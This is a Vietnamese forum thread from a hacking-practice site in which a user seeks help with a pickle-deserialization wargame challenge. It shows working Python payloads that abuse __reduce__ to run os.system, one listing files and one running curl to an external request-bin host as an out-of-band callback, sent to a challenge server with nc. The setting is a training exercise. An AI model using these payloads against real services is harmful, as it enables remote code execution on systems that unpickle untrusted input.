Cho cháu hỏi bài Misc06 trong Play ! 2

[learn2hack]

Cho cháu hỏi bài Misc06 trong Play ! 2
theo Mô tả và Gợi ý
Pickle

OMG! Pickle again

nc 103.237.98.28 7475
là dạng bài Deserialization Pickle,

cháu viết exploit sau
#!/usr/bin/env python

import pickle
import os

class Exploit(object):
def __reduce__(self):
return (os.system, ('ls',))
#note = Note("name", "date", "content")
with open("save.pickle", 'wb') as f:
pickle.dump(Exploit(), f, protocol=0)

gửi exploit bởi lệnh:
cat save.pickle | nc 103.237.98.28 7475
nhận được respone "Ahihihi?" từ server

Cháu không hiểu ý đồ tác giả bài này là thế nào ạ?

 

Chào bạn, bạn mình đã báo Mod phụ trách Wargame để phản hồi bạn nhé.

 

Bài này server không phản hồi, Nên bạn thử sử dụng kỹ thuật dùng lệnh curl lên host free để xem mình có thể thực hiện được câu lệnh hay chưa

 

Bài này server không phản hồi, Nên bạn thử sử dụng kỹ thuật dùng lệnh curl lên host free để xem mình có thể thực hiện được câu lệnh hay chưa

Cháu sửa lại payload
import cPickle
import os

cmd = "curl http://requestbin.fullcontact.com/5a23as26"

class ex(object):
def __reduce__(self):
return (os.system,(cmd,))

print cPickle.dumps(ex())

gửi tới server nhưng không thấy phản hồi trên requestbin

Vẫn chưa được, chú xem payload trên sao không chạy ạ?

 

Cháu sửa lại payload
import cPickle
import os

cmd = "curl http://requestbin.fullcontact.com/5a23as26"

class ex(object):
def __reduce__(self):
return (os.system,(cmd,))

print cPickle.dumps(ex())

gửi tới server nhưng không thấy phản hồi trên requestbin

Vẫn chưa được, chú xem payload trên sao không chạy ạ?

Mình chạy payload của bạn vẫn bình thường, bạn xem lại nhé

 

Mình chạy payload của bạn vẫn bình thường, bạn xem lại nhé

Giờ được rồi chú gì ạ. Vui quá thanh chú